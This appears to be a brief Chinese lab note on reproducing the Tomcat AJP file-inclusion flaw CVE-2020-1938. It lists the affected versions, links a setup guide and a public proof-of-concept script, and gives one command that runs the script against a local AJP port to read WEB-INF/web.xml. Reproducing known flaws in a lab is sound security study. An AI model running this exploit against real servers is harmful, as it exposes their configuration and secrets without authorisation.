@TOC
Tomcat文件包含漏洞(CVE-2020-1938)
开始编写
环境搭建
https://blog.csdn.net/BoZhihouci/article/details/107832298
受影响版本
Apache Tomcat = 6
7 <= Apache Tomcat <7.0.100
8 <= Apache Tomcat <8.5.51
9 <= Apache Tomcat <9.0.31
本次使用版本
Tomcat 7.0.69
POC
https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi
复现方式
python CNVD-2020-10487-Tomcat-Ajp-lfi.py 127.0.0.1 -p 8009 -f WEB-INF/web.xml
乾坤未定,你我皆是黑马